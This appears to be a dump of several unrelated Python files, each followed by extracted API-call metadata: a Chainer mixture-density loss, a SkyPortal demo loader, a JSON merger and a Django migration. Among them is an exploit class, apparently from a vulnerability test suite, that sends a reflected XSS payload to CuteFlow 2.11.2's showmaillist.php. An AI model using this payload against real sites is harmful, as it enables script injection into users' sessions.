'(peek)\n', (2179, 2185), True, 'import numpy as np\n'), ((7011, 7042), 'numpy.expand_dims', 'np.expand_dims', (['data[i]'], {'axis': '(0)'}), '(data[i], axis=0)\n', (7025, 7042), True, 'import numpy as np\n')] |
import chainer
import chainer.functions
from chainer.utils import type_check
from chainer import cuda
from chainer import function
import numpy as np
#from chainer import function_node
from utils import clip_grad
#class MixtureDensityNetworkFunction(function_node.FunctionNode):
class MixtureDensityNetworkFunction(function.Function):
def check_type_forward(self, in_types):
type_check.expect(in_types.size() == 8)
x_type, eos_input_type, pi_input_type, mu_x1_input_type, mu_x2_input_type, s_x1_input_type, s_x2_input_type, rho_input_type = in_types
type_check.expect(
x_type.dtype.kind == 'f',
eos_input_type.dtype.kind == 'f',
pi_input_type.dtype.kind == 'f',
mu_x1_input_type.dtype.kind == 'f',
mu_x2_input_type.dtype.kind == 'f',
s_x1_input_type.dtype.kind == 'f',
s_x2_input_type.dtype.kind == 'f',
rho_input_type.dtype.kind == 'f',
x_type.ndim >= 2,
eos_input_type.ndim >= 2,
x_type.shape[0] == eos_input_type.shape[0],
x_type.shape[0] == pi_input_type.shape[0],
x_type.shape[0] == mu_x1_input_type.shape[0],
x_type.shape[0] == mu_x2_input_type.shape[0],
x_type.shape[0] == s_x1_input_type.shape[0],
x_type.shape[0] == s_x2_input_type.shape[0],
x_type.shape[0] == rho_input_type.shape[0],
pi_input_type.shape[1] == mu_x1_input_type.shape[1],
mu_x1_input_type.shape[1] == mu_x2_input_type.shape[1],
mu_x2_input_type.shape[1] == s_x1_input_type.shape[1],
s_x1_input_type.shape[1] == s_x2_input_type.shape[1],
s_x2_input_type.shape[1] == rho_input_type.shape[1]
)
pass
def forward(self, inputs):
x, eos_input, pi_input, mu_x1_input, mu_x2_input, s_x1_input, s_x2_input, rho_input = inputs
#self.retain_inputs(range(len(inputs))) # Retain everything for backward
if not type_check.same_types(*inputs):
raise ValueError("numpy and cupy must not be used together\n"
"type(x): {0}, type(eos_input): {1}, type(pi_input): {2}"
"type(mu_x1_input): {3}, type(mu_x2_input): {4}, type(s_x1_input): {5}"
"type(s_x2_input): {6}, type(rho_input): {7}"
.format(type(x), type(eos_input), type(pi_input),
type(mu_x1_input), type(mu_x2_input), type(s_x1_input),
type(s_x2_input), type(rho_input)))
xp = cuda.get_array_module(*inputs)
def softmax(x):
shiftx = x - x.max()
exps = xp.exp(shiftx)
return exps / xp.sum(exps, 1, keepdims=True)
# Get MDN coeff. Eq #18 to #22
z_eos = 1. / (1. + xp.exp(eos_input)) # F.sigmoid. NOTE: usually sigmoid is 1/(1+e^-x). Here 'x' is >0!
z_s_x1 = xp.exp(s_x1_input) + 1e-10
z_s_x2 = xp.exp(s_x2_input) + 1e-10
z_rho = xp.tanh(rho_input)
z_pi = softmax(pi_input)
#z_pi = xp.exp(pi_input)
#z_pi = z_pi / xp.sum(z_pi, 1, keepdims=True)
z_mu_x1 = mu_x1_input
z_mu_x2 = mu_x2_input
# The MDN coeff are saved, because they're reused in the backward phase
self.z_eos = z_eos
self.z_s_x1 = z_s_x1
self.z_s_x2 = z_s_x2
self.z_rho = z_rho
self.z_pi = z_pi
self.z_mu_x1 = z_mu_x1
self.z_mu_x2 = z_mu_x2
# Compute the loss.
x1 = x[:, 0:1]
x2 = x[:, 1:2]
x3 = x[:, 2:3]
# Z variable. Eq. 25
norm_x1 = x1 - z_mu_x1
norm_x2 = x2 - z_mu_x2
z_left = (xp.square(norm_x1)/xp.square(z_s_x1)) + (xp.square(norm_x2)/xp.square(z_s_x2))
z_right = (2.*z_rho*norm_x1*norm_x2)/(z_s_x1*z_s_x2)
z = z_left - z_right
self.z = z
# Normal function. Eq. 24.
inv_ro = 1. - xp.square(z_rho) + 1e-10
n_left = 2. * np.pi * z_s_x1 * z_s_x2 * xp.sqrt(inv_ro) + 1e-10 # + 1e-10 for computational stability
n_right = xp.exp(-z / (2. * inv_ro))
n = n_right / n_left
# Gamma parameter (for the backward phase). Eq. 28-29
gamma = z_pi * n
gamma = gamma / (xp.sum(gamma, 1, keepdims=True) + 1e-10) # sum + 1e-10 for computational stability, != nan!
self.gamma = gamma
# Sequence loss. Eq. 26
loss_y = z_pi * n
loss_y = xp.sum(loss_y, 1, keepdims=True) + 1e-10 # + 1e-10 for computational stability, != nan
#epsilon = xp.full(loss_y.shape, 1e-10, dtype=xp.float32)
#loss_y = xp.maximum(loss_y, epsilon) # Because at the begining loss_y is exactly 0 sometime
loss_y = -xp.log(loss_y + 1e-10)
#loss_x = z_eos * x3 + (1. - z_eos) * (1. - x3)
#loss_x = -xp.log(loss_x)
loss_x = -x3 * xp.log(z_eos + 1e-10) - (1. - x3) * xp.log(1. - z_eos + 1e-10)
loss = loss_y + loss_x
# Mask guard to check if x3 == 2 (added padding)
idx_mask = xp.where(x3==2)[0]
mask = xp.ones_like(x3)
mask[idx_mask, 0] = 0.
self.mask = mask
loss *= mask
return loss, x, z_eos, z_pi, z_mu_x1, z_mu_x2, z_s_x1, z_s_x2, z_rho,
def backward(self, inputs, grad_outputs):
xp = cuda.get_array_module(*inputs)
#x, eos_input, pi_input, mu_x1_input, mu_x2_input, s_x1_input, s_x2_input, rho_input = self.get_retained_inputs()
x, eos_input, pi_input, mu_x1_input, mu_x2_input, s_x1_input, s_x2_input, rho_input = inputs
# MDN coeff to differentiate
g_eos = xp.empty_like(eos_input)
g_s_x1 = xp.empty_like(s_x1_input)
g_s_x2 = xp.empty_like(s_x2_input)
g_rho = xp.empty_like(rho_input)
g_pi = xp.empty_like(pi_input)
g_mu_x1 = xp.empty_like(mu_x1_input)
g_mu_x2 = xp.empty_like(mu_x2_input)
# Compute the gradient
x1 = x[:, 0:1]
x2 = x[:, 1:2]
x3 = x[:, 2:3]
#if xp == np:
# From eq. 27 to 37
C = 1. / (1. - self.z_rho*self.z_rho + 1e-10)
d_norm_x1 = (x1 - self.z_mu_x1) / self.z_s_x1
d_norm_x2 = (x2 - self.z_mu_x2) / self.z_s_x2
d_rho_norm_x1 = self.z_rho * d_norm_x1
d_rho_norm_x2 = self.z_rho * d_norm_x2
g_eos = (x3 - self.z_eos) * self.mask
g_pi = (self.z_pi - self.gamma) * self.mask
g_mu_x1 = - self.gamma * ((C/self.z_s_x1) * (d_norm_x1 - d_rho_norm_x2)) * self.mask
g_mu_x2 = - self.gamma * ((C/self.z_s_x2) * (d_norm_x2 - d_rho_norm_x1)) * self.mask
g_s_x1 = - self.gamma * ((C*d_norm_x1) * (d_norm_x1 - d_rho_norm_x2) - 1.) * self.mask
g_s_x2 = - self.gamma * ((C*d_norm_x2) * (d_norm_x2 - d_rho_norm_x1) - 1.) * self.mask
g_rho = - self.gamma * (d_norm_x1*d_norm_x2 + self.z_rho*(1. - C * self.z)) * self.mask
#else:
# g_eos, g_pi, g_mu_x1, g_mu_x2, g_s_x1, g_s_x2, g_rho = cuda.elementwise(
# 'T x1, T x2, T eos_input, T pi_input, T mu_x1_input, T mu_x2_input, T s_x1_input, T s_x2_input, T rho_input',
# 'T g_eos, T g_pi, T g_mu_x1, T g_mu_x2, T g_s_x1, T g_s_x2, T g_rho',
# )
# Add grad_clipping here if it explodes P.23
th_min = -100.0
th_max = 100.0
g_eos = clip_grad(g_eos, th_min, th_max, xp)
g_pi = clip_grad(g_pi, th_min, th_max, xp)
g_mu_x1 = clip_grad(g_mu_x1, th_min, th_max, xp)
g_mu_x2 = clip_grad(g_mu_x2, th_min, th_max, xp)
g_s_x1 = clip_grad(g_s_x1, th_min, th_max, xp)
g_s_x2 = clip_grad(g_s_x2, th_min, th_max, xp)
g_rho = clip_grad(g_rho, th_min, th_max, xp)
return None, g_eos, g_pi, g_mu_x1, g_mu_x2, g_s_x1, g_s_x2, g_rho,
def mixture_density_network(x, eos, pi, mu_x1, mu_x2, s_x1, s_x2, rho):
""" Mixture Density Network
Output the coefficient params
Args:
x (Variable): Tensor containing the position [x1, x2, x3] to predict
eos (Variable): End-of-stroke prediction
pi (Variable): mixture components
mu_x1 (Variable): mean of x1
mu_x2 (Variable): mean of x2
s_x1 (Variable): variance of x1
s_x2 (Variable): variance of x2
rho (Variable): correlation parameter
Returns:
loss (Variable)
y (Variable)
eos (Variable)
pi (Variable)
mu_x1 (Variable)
mu_x2 (Variable)
s_x1 (Variable)
s_x2 (Variable)
rho (Variable)
"""
return MixtureDensityNetworkFunction()(x, eos, pi, mu_x1, mu_x2, s_x1, s_x2, rho)
| [
"chainer.utils.type_check.same_types",
"utils.clip_grad",
"chainer.utils.type_check.expect",
"chainer.cuda.get_array_module"
] | [((583, 1553), 'chainer.utils.type_check.expect', 'type_check.expect', (["(x_type.dtype.kind == 'f')", "(eos_input_type.dtype.kind == 'f')", "(pi_input_type.dtype.kind == 'f')", "(mu_x1_input_type.dtype.kind == 'f')", "(mu_x2_input_type.dtype.kind == 'f')", "(s_x1_input_type.dtype.kind == 'f')", "(s_x2_input_type.dtype.kind == 'f')", "(rho_input_type.dtype.kind == 'f')", '(x_type.ndim >= 2)', '(eos_input_type.ndim >= 2)', '(x_type.shape[0] == eos_input_type.shape[0])', '(x_type.shape[0] == pi_input_type.shape[0])', '(x_type.shape[0] == mu_x1_input_type.shape[0])', '(x_type.shape[0] == mu_x2_input_type.shape[0])', '(x_type.shape[0] == s_x1_input_type.shape[0])', '(x_type.shape[0] == s_x2_input_type.shape[0])', '(x_type.shape[0] == rho_input_type.shape[0])', '(pi_input_type.shape[1] == mu_x1_input_type.shape[1])', '(mu_x1_input_type.shape[1] == mu_x2_input_type.shape[1])', '(mu_x2_input_type.shape[1] == s_x1_input_type.shape[1])', '(s_x1_input_type.shape[1] == s_x2_input_type.shape[1])', '(s_x2_input_type.shape[1] == rho_input_type.shape[1])'], {}), "(x_type.dtype.kind == 'f', eos_input_type.dtype.kind ==\n 'f', pi_input_type.dtype.kind == 'f', mu_x1_input_type.dtype.kind ==\n 'f', mu_x2_input_type.dtype.kind == 'f', s_x1_input_type.dtype.kind ==\n 'f', s_x2_input_type.dtype.kind == 'f', rho_input_type.dtype.kind ==\n 'f', x_type.ndim >= 2, eos_input_type.ndim >= 2, x_type.shape[0] ==\n eos_input_type.shape[0], x_type.shape[0] == pi_input_type.shape[0], \n x_type.shape[0] == mu_x1_input_type.shape[0], x_type.shape[0] ==\n mu_x2_input_type.shape[0], x_type.shape[0] == s_x1_input_type.shape[0],\n x_type.shape[0] == s_x2_input_type.shape[0], x_type.shape[0] ==\n rho_input_type.shape[0], pi_input_type.shape[1] == mu_x1_input_type.\n shape[1], mu_x1_input_type.shape[1] == mu_x2_input_type.shape[1], \n mu_x2_input_type.shape[1] == s_x1_input_type.shape[1], s_x1_input_type.\n shape[1] == s_x2_input_type.shape[1], s_x2_input_type.shape[1] ==\n rho_input_type.shape[1])\n", (600, 1553), False, 'from chainer.utils import type_check\n'), ((2659, 2689), 'chainer.cuda.get_array_module', 'cuda.get_array_module', (['*inputs'], {}), '(*inputs)\n', (2680, 2689), False, 'from chainer import cuda\n'), ((5410, 5440), 'chainer.cuda.get_array_module', 'cuda.get_array_module', (['*inputs'], {}), '(*inputs)\n', (5431, 5440), False, 'from chainer import cuda\n'), ((7448, 7484), 'utils.clip_grad', 'clip_grad', (['g_eos', 'th_min', 'th_max', 'xp'], {}), '(g_eos, th_min, th_max, xp)\n', (7457, 7484), False, 'from utils import clip_grad\n'), ((7500, 7535), 'utils.clip_grad', 'clip_grad', (['g_pi', 'th_min', 'th_max', 'xp'], {}), '(g_pi, th_min, th_max, xp)\n', (7509, 7535), False, 'from utils import clip_grad\n'), ((7554, 7592), 'utils.clip_grad', 'clip_grad', (['g_mu_x1', 'th_min', 'th_max', 'xp'], {}), '(g_mu_x1, th_min, th_max, xp)\n', (7563, 7592), False, 'from utils import clip_grad\n'), ((7611, 7649), 'utils.clip_grad', 'clip_grad', (['g_mu_x2', 'th_min', 'th_max', 'xp'], {}), '(g_mu_x2, th_min, th_max, xp)\n', (7620, 7649), False, 'from utils import clip_grad\n'), ((7667, 7704), 'utils.clip_grad', 'clip_grad', (['g_s_x1', 'th_min', 'th_max', 'xp'], {}), '(g_s_x1, th_min, th_max, xp)\n', (7676, 7704), False, 'from utils import clip_grad\n'), ((7722, 7759), 'utils.clip_grad', 'clip_grad', (['g_s_x2', 'th_min', 'th_max', 'xp'], {}), '(g_s_x2, th_min, th_max, xp)\n', (7731, 7759), False, 'from utils import clip_grad\n'), ((7776, 7812), 'utils.clip_grad', 'clip_grad', (['g_rho', 'th_min', 'th_max', 'xp'], {}), '(g_rho, th_min, th_max, xp)\n', (7785, 7812), False, 'from utils import clip_grad\n'), ((2023, 2053), 'chainer.utils.type_check.same_types', 'type_check.same_types', (['*inputs'], {}), '(*inputs)\n', (2044, 2053), False, 'from chainer.utils import type_check\n')] |
import datetime
import os
import subprocess
import base64
from pathlib import Path
import shutil
import pandas as pd
import signal
import requests
from baselayer.app.env import load_env
from baselayer.app.model_util import status, create_tables, drop_tables
from social_tornado.models import TornadoStorage
from skyportal.models import init_db, Base, DBSession, Source, User
from skyportal.model_util import setup_permissions, create_token
from skyportal.tests import api
from baselayer.tools.test_frontend import verify_server_availability
if __name__ == "__main__":
"""Insert test data"""
env, cfg = load_env()
basedir = Path(os.path.dirname(__file__)) / ".."
with status(f"Connecting to database {cfg['database']['database']}"):
init_db(**cfg["database"])
with status("Dropping all tables"):
drop_tables()
with status("Creating tables"):
create_tables()
for model in Base.metadata.tables:
print(" -", model)
with status(f"Creating permissions"):
setup_permissions()
with status(f"Creating dummy users"):
super_admin_user = User(
username="<EMAIL>", role_ids=["Super admin"]
)
group_admin_user = User(
username="<EMAIL>", role_ids=["Super admin"]
)
full_user = User(username="<EMAIL>", role_ids=["Full user"])
view_only_user = User(
username="<EMAIL>", role_ids=["View only"]
)
DBSession().add_all(
[super_admin_user, group_admin_user, full_user, view_only_user]
)
for u in [super_admin_user, group_admin_user, full_user, view_only_user]:
DBSession().add(
TornadoStorage.user.create_social_auth(u, u.username, "google-oauth2")
)
with status("Creating token"):
token = create_token(
[
"Manage groups",
"Manage sources",
"Upload data",
"Comment",
"Manage users",
],
super_admin_user.id,
"load_demo_data token",
)
def assert_post(endpoint, data):
response_status, data = api("POST", endpoint, data, token)
if not response_status == 200 and data["status"] == "success":
raise RuntimeError(
f'API call to {endpoint} failed with status {status}: {data["message"]}'
)
return data
with status("Launching web app & executing API calls"):
try:
response_status, data = api("GET", "sysinfo", token=token)
app_already_running = True
except requests.ConnectionError:
app_already_running = False
web_client = subprocess.Popen(
["make", "run"], cwd=basedir, preexec_fn=os.setsid
)
server_url = f"http://localhost:{cfg['ports.app']}"
print()
print(f"Waiting for server to appear at {server_url}...")
try:
verify_server_availability(server_url)
print("App running - continuing with API calls")
with status("Creating dummy group & adding users"):
data = assert_post(
"groups",
data={
"name": "Stream A",
"group_admins": [
super_admin_user.username,
group_admin_user.username,
],
},
)
group_id = data["data"]["id"]
for u in [view_only_user, full_user]:
data = assert_post(
f"groups/{group_id}/users/{u.username}", data={"admin": False}
)
with status("Creating dummy instruments"):
data = assert_post(
"telescope",
data={
"name": "Palomar 1.5m",
"nickname": "P60",
"lat": 33.3633675,
"lon": -116.8361345,
"elevation": 1870,
"diameter": 1.5,
"group_ids": [group_id],
},
)
telescope1_id = data["data"]["id"]
data = assert_post(
"instrument",
data={
"name": "P60 Camera",
"type": "phot",
"band": "optical",
"telescope_id": telescope1_id,
},
)
instrument1_id = data["data"]["id"]
data = assert_post(
"telescope",
data={
"name": "Nordic Optical Telescope",
"nickname": "NOT",
"lat": 28.75,
"lon": 17.88,
"elevation": 1870,
"diameter": 2.56,
"group_ids": [group_id],
},
)
telescope2_id = data["data"]["id"]
data = assert_post(
"instrument",
data={
"name": "ALFOSC",
"type": "both",
"band": "optical",
"telescope_id": telescope2_id,
},
)
with status("Creating dummy sources"):
SOURCES = [
{
"id": "14gqr",
"ra": 353.36647,
"dec": 33.646149,
"redshift": 0.063,
"group_ids": [group_id],
"comments": [
"No source at transient location to R>26 in LRIS imaging",
"Strong calcium lines have emerged.",
],
},
{
"id": "16fil",
"ra": 322.718872,
"dec": 27.574113,
"redshift": 0.0,
"group_ids": [group_id],
"comments": ["Frogs in the pond", "The eagle has landed"],
},
]
(basedir / "static/thumbnails").mkdir(parents=True, exist_ok=True)
for source_info in SOURCES:
comments = source_info.pop("comments")
data = assert_post("sources", data=source_info)
assert data["data"]["id"] == source_info["id"]
for comment in comments:
data = assert_post(
"comment",
data={"source_id": source_info["id"], "text": comment},
)
phot_file = basedir / "skyportal/tests/data/phot.csv"
phot_data = pd.read_csv(phot_file)
data = assert_post(
"photometry",
data={
"source_id": source_info["id"],
"time_format": "iso",
"time_scale": "utc",
"instrument_id": instrument1_id,
"observed_at": phot_data.observed_at.tolist(),
"mag": phot_data.mag.tolist(),
"e_mag": phot_data.e_mag.tolist(),
"lim_mag": phot_data.lim_mag.tolist(),
"filter": phot_data["filter"].tolist(),
},
)
spec_file = os.path.join(
os.path.dirname(os.path.dirname(__file__)),
"skyportal",
"tests",
"data",
"spec.csv",
)
spec_data = pd.read_csv(spec_file)
for i, df in spec_data.groupby("instrument_id"):
data = assert_post(
"spectrum",
data={
"source_id": source_info["id"],
"observed_at": str(datetime.datetime(2014, 10, 24)),
"instrument_id": 1,
"wavelengths": df.wavelength.tolist(),
"fluxes": df.flux.tolist(),
},
)
for ttype in ["new", "ref", "sub"]:
fname = f'{source_info["id"]}_{ttype}.png'
fpath = basedir / f"skyportal/tests/data/{fname}"
thumbnail_data = base64.b64encode(
open(os.path.abspath(fpath), "rb").read()
)
data = assert_post(
"thumbnail",
data={
"source_id": source_info["id"],
"data": thumbnail_data,
"ttype": ttype,
},
)
source = Source.query.get(source_info["id"])
source.add_linked_thumbnails()
finally:
if not app_already_running:
print("Terminating web app")
os.killpg(os.getpgid(web_client.pid), signal.SIGTERM)
| [
"skyportal.models.User",
"pandas.read_csv",
"baselayer.tools.test_frontend.verify_server_availability",
"datetime.datetime",
"baselayer.app.model_util.create_tables",
"subprocess.Popen",
"skyportal.models.Source.query.get",
"skyportal.models.DBSession",
"skyportal.models.init_db",
"os.getpgid",
"skyportal.model_util.setup_permissions",
"social_tornado.models.TornadoStorage.user.create_social_auth",
"baselayer.app.env.load_env",
"os.path.dirname",
"baselayer.app.model_util.status",
"skyportal.model_util.create_token",
"baselayer.app.model_util.drop_tables",
"os.path.abspath",
"skyportal.tests.api"
] | [((613, 623), 'baselayer.app.env.load_env', 'load_env', ([], {}), '()\n', (621, 623), False, 'from baselayer.app.env import load_env\n'), ((687, 750), 'baselayer.app.model_util.status', 'status', (['f"""Connecting to database {cfg[\'database\'][\'database\']}"""'], {}), '(f"Connecting to database {cfg[\'database\'][\'database\']}")\n', (693, 750), False, 'from baselayer.app.model_util import status, create_tables, drop_tables\n'), ((760, 786), 'skyportal.models.init_db', 'init_db', ([], {}), "(**cfg['database'])\n", (767, 786), False, 'from skyportal.models import init_db, Base, DBSession, Source, User\n'), ((797, 826), 'baselayer.app.model_util.status', 'status', (['"""Dropping all tables"""'], {}), "('Dropping all tables')\n", (803, 826), False, 'from baselayer.app.model_util import status, create_tables, drop_tables\n'), ((836, 849), 'baselayer.app.model_util.drop_tables', 'drop_tables', ([], {}), '()\n', (847, 849), False, 'from baselayer.app.model_util import status, create_tables, drop_tables\n'), ((860, 885), 'baselayer.app.model_util.status', 'status', (['"""Creating tables"""'], {}), "('Creating tables')\n", (866, 885), False, 'from baselayer.app.model_util import status, create_tables, drop_tables\n'), ((895, 910), 'baselayer.app.model_util.create_tables', 'create_tables', ([], {}), '()\n', (908, 910), False, 'from baselayer.app.model_util import status, create_tables, drop_tables\n'), ((991, 1022), 'baselayer.app.model_util.status', 'status', (['f"""Creating permissions"""'], {}), "(f'Creating permissions')\n", (997, 1022), False, 'from baselayer.app.model_util import status, create_tables, drop_tables\n'), ((1032, 1051), 'skyportal.model_util.setup_permissions', 'setup_permissions', ([], {}), '()\n', (1049, 1051), False, 'from skyportal.model_util import setup_permissions, create_token\n'), ((1062, 1093), 'baselayer.app.model_util.status', 'status', (['f"""Creating dummy users"""'], {}), "(f'Creating dummy users')\n", (1068, 1093), False, 'from baselayer.app.model_util import status, create_tables, drop_tables\n'), ((1122, 1172), 'skyportal.models.User', 'User', ([], {'username': '"""<EMAIL>"""', 'role_ids': "['Super admin']"}), "(username='<EMAIL>', role_ids=['Super admin'])\n", (1126, 1172), False, 'from skyportal.models import init_db, Base, DBSession, Source, User\n'), ((1222, 1272), 'skyportal.models.User', 'User', ([], {'username': '"""<EMAIL>"""', 'role_ids': "['Super admin']"}), "(username='<EMAIL>', role_ids=['Super admin'])\n", (1226, 1272), False, 'from skyportal.models import init_db, Base, DBSession, Source, User\n'), ((1315, 1363), 'skyportal.models.User', 'User', ([], {'username': '"""<EMAIL>"""', 'role_ids': "['Full user']"}), "(username='<EMAIL>', role_ids=['Full user'])\n", (1319, 1363), False, 'from skyportal.models import init_db, Base, DBSession, Source, User\n'), ((1389, 1437), 'skyportal.models.User', 'User', ([], {'username': '"""<EMAIL>"""', 'role_ids': "['View only']"}), "(username='<EMAIL>', role_ids=['View only'])\n", (1393, 1437), False, 'from skyportal.models import init_db, Base, DBSession, Source, User\n'), ((1798, 1822), 'baselayer.app.model_util.status', 'status', (['"""Creating token"""'], {}), "('Creating token')\n", (1804, 1822), False, 'from baselayer.app.model_util import status, create_tables, drop_tables\n'), ((1840, 1980), 'skyportal.model_util.create_token', 'create_token', (["['Manage groups', 'Manage sources', 'Upload data', 'Comment', 'Manage users']", 'super_admin_user.id', '"""load_demo_data token"""'], {}), "(['Manage groups', 'Manage sources', 'Upload data', 'Comment',\n 'Manage users'], super_admin_user.id, 'load_demo_data token')\n", (1852, 1980), False, 'from skyportal.model_util import setup_permissions, create_token\n'), ((2189, 2223), 'skyportal.tests.api', 'api', (['"""POST"""', 'endpoint', 'data', 'token'], {}), "('POST', endpoint, data, token)\n", (2192, 2223), False, 'from skyportal.tests import api\n'), ((2460, 2509), 'baselayer.app.model_util.status', 'status', (['"""Launching web app & executing API calls"""'], {}), "('Launching web app & executing API calls')\n", (2466, 2509), False, 'from baselayer.app.model_util import status, create_tables, drop_tables\n'), ((643, 668), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (658, 668), False, 'import os\n'), ((2560, 2594), 'skyportal.tests.api', 'api', (['"""GET"""', '"""sysinfo"""'], {'token': 'token'}), "('GET', 'sysinfo', token=token)\n", (2563, 2594), False, 'from skyportal.tests import api\n'), ((3008, 3046), 'baselayer.tools.test_frontend.verify_server_availability', 'verify_server_availability', (['server_url'], {}), '(server_url)\n', (3034, 3046), False, 'from baselayer.tools.test_frontend import verify_server_availability\n'), ((1468, 1479), 'skyportal.models.DBSession', 'DBSession', ([], {}), '()\n', (1477, 1479), False, 'from skyportal.models import init_db, Base, DBSession, Source, User\n'), ((1703, 1773), 'social_tornado.models.TornadoStorage.user.create_social_auth', 'TornadoStorage.user.create_social_auth', (['u', 'u.username', '"""google-oauth2"""'], {}), "(u, u.username, 'google-oauth2')\n", (1741, 1773), False, 'from social_tornado.models import TornadoStorage\n'), ((2740, 2808), 'subprocess.Popen', 'subprocess.Popen', (["['make', 'run']"], {'cwd': 'basedir', 'preexec_fn': 'os.setsid'}), "(['make', 'run'], cwd=basedir, preexec_fn=os.setsid)\n", (2756, 2808), False, 'import subprocess\n'), ((3126, 3171), 'baselayer.app.model_util.status', 'status', (['"""Creating dummy group & adding users"""'], {}), "('Creating dummy group & adding users')\n", (3132, 3171), False, 'from baselayer.app.model_util import status, create_tables, drop_tables\n'), ((3798, 3834), 'baselayer.app.model_util.status', 'status', (['"""Creating dummy instruments"""'], {}), "('Creating dummy instruments')\n", (3804, 3834), False, 'from baselayer.app.model_util import status, create_tables, drop_tables\n'), ((5550, 5582), 'baselayer.app.model_util.status', 'status', (['"""Creating dummy sources"""'], {}), "('Creating dummy sources')\n", (5556, 5582), False, 'from baselayer.app.model_util import status, create_tables, drop_tables\n'), ((1670, 1681), 'skyportal.models.DBSession', 'DBSession', ([], {}), '()\n', (1679, 1681), False, 'from skyportal.models import init_db, Base, DBSession, Source, User\n'), ((7117, 7139), 'pandas.read_csv', 'pd.read_csv', (['phot_file'], {}), '(phot_file)\n', (7128, 7139), True, 'import pandas as pd\n'), ((8158, 8180), 'pandas.read_csv', 'pd.read_csv', (['spec_file'], {}), '(spec_file)\n', (8169, 8180), True, 'import pandas as pd\n'), ((9486, 9521), 'skyportal.models.Source.query.get', 'Source.query.get', (["source_info['id']"], {}), "(source_info['id'])\n", (9502, 9521), False, 'from skyportal.models import init_db, Base, DBSession, Source, User\n'), ((9701, 9727), 'os.getpgid', 'os.getpgid', (['web_client.pid'], {}), '(web_client.pid)\n', (9711, 9727), False, 'import os\n'), ((7938, 7963), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (7953, 7963), False, 'import os\n'), ((8484, 8515), 'datetime.datetime', 'datetime.datetime', (['(2014)', '(10)', '(24)'], {}), '(2014, 10, 24)\n', (8501, 8515), False, 'import datetime\n'), ((9048, 9070), 'os.path.abspath', 'os.path.abspath', (['fpath'], {}), '(fpath)\n', (9063, 9070), False, 'import os\n')] |
# Copyright 2013 University of Maryland. All rights reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE.TXT file.
import sys
import os
import time
from selenium.common.exceptions import NoAlertPresentException
import framework
class Exploit (framework.Exploit):
attributes = {'Name' : "CUTEFLOW_0024",
'Description' : "CuteFlow v2.11.2 cross site scripting attack.",
'References' : [['http://itsecuritysolutions.org/2012-07-01-CuteFlow-2.11.2-multiple-security-vulnerabilities/']],
'Target' : "CuteFlow 2.11.2",
'TargetLicense' : '',
'VulWikiPage' : "",
'Type' : 'XSS'
}
def __init__(self, visible=False):
framework.Exploit.__init__(self, visible)
self.verified = False
return
def exploit(self):
driver = self.create_selenium_driver()
driver.get("http://localhost/cuteflow/pages/showmaillist.php?sortby=\"><script>alert(\"XSS\");</script><p+\"")
self.logger.info("XSS link visited")
try:
driver.get_alert()
self.logger.info("XSS popup comfirmed")
self.verified = True
except NoAlertPresentException:
self.logger.error("XSS failed")
if self.visible:
time.sleep(10)
driver.cleanup()
return
def verify(self):
return self.verified
| [
"framework.Exploit.__init__",
"time.sleep"
] | [((825, 866), 'framework.Exploit.__init__', 'framework.Exploit.__init__', (['self', 'visible'], {}), '(self, visible)\n', (851, 866), False, 'import framework\n'), ((1428, 1442), 'time.sleep', 'time.sleep', (['(10)'], {}), '(10)\n', (1438, 1442), False, 'import time\n')] |
# -*- coding: utf-8 -*-
"""
Created on Tue Jul 7 20:14:22 2020
Simple script to join json files
@author: SERGI
"""
import json
import sys
import os
def readJson(path):
with open(path, "r") as file:
return json.load(file)
def writeJson(path, dicc):
with open(path, "w") as file:
json.dump(dicc, file)
if __name__ == "__main__":
print("hello from python", flush=True)
jsonPath = str(sys.argv[1])
# =============================================================================
# jsonPath = "../eclipse-workspace/prueba/target/json/"
# =============================================================================
jsonPathTemp = jsonPath+"temp/"
arr = os.listdir(jsonPathTemp)
arr.sort()
print(arr)
dict_to_json = {}
dict_0 = readJson(jsonPathTemp + arr[0])
dict_1 = readJson(jsonPathTemp + arr[1])
dict_2 = readJson(jsonPathTemp + arr[2])
dict_3 = readJson(jsonPathTemp + arr[3])
keys = [name for name in dict_0.keys() if "0" not in name]
for key in keys:
dict_to_json[key] = dict_0[key] + dict_1[key] + dict_2[key] + dict_3[key]
#0seg,f_step,f_stop
seg = dict_0['0seg,f_step,f_stop'][0]
step = dict_0['0seg,f_step,f_stop'][1]
stop = dict_3['0seg,f_step,f_stop'][2]
dict_to_json['0seg,f_step,f_stop'] = [seg, step, stop]
print("Escribiendo json: ", jsonPath+arr[0], flush=True)
writeJson(jsonPath+arr[0], dict_to_json)
print("finish", flush=True) | [
"json.load",
"os.listdir",
"json.dump"
] | [((743, 767), 'os.listdir', 'os.listdir', (['jsonPathTemp'], {}), '(jsonPathTemp)\n', (753, 767), False, 'import os\n'), ((237, 252), 'json.load', 'json.load', (['file'], {}), '(file)\n', (246, 252), False, 'import json\n'), ((331, 352), 'json.dump', 'json.dump', (['dicc', 'file'], {}), '(dicc, file)\n', (340, 352), False, 'import json\n')] |
# Generated by Django 3.0.2 on 2020-01-23 11:02
import re
import django.contrib.postgres.fields.citext
import django.core.validators
from django.db import migrations
import grandchallenge.challenges.models
class Migration(migrations.Migration):
dependencies = [
("challenges", "0022_auto_20200121_1639"),
]
operations = [
migrations.AlterField(
model_name="challenge",
name="short_name",
field=django.contrib.postgres.fields.citext.CICharField(
help_text="short name used in url, specific css, files etc. No spaces allowed",
max_length=50,
unique=True,
validators=[
grandchallenge.challenges.models.validate_nounderscores,
django.core.validators.RegexValidator(
re.compile("^[-a-zA-Z0-9_]+\\Z"),
"Enter a valid “slug” consisting of letters, numbers, underscores or hyphens.",
"invalid",
),
grandchallenge.challenges.models.validate_short_name,
],
),
),
migrations.AlterField(
model_name="externalchallenge",
name="short_name",
field=django.contrib.postgres.fields.citext.CICharField(
help_text="short name used in url, specific css, files etc. No spaces allowed",
max_length=50,
unique=True,
validators=[
grandchallenge.challenges.models.validate_nounderscores,
django.core.validators.RegexValidator(
re.compile("^[-a-zA-Z0-9_]+\\Z"),
"Enter a valid “slug” consisting of letters, numbers, underscores or hyphens.",
"invalid",
),
grandchallenge.challenges.models.validate_short_name,
],
),
),
]
| [
"re.compile"
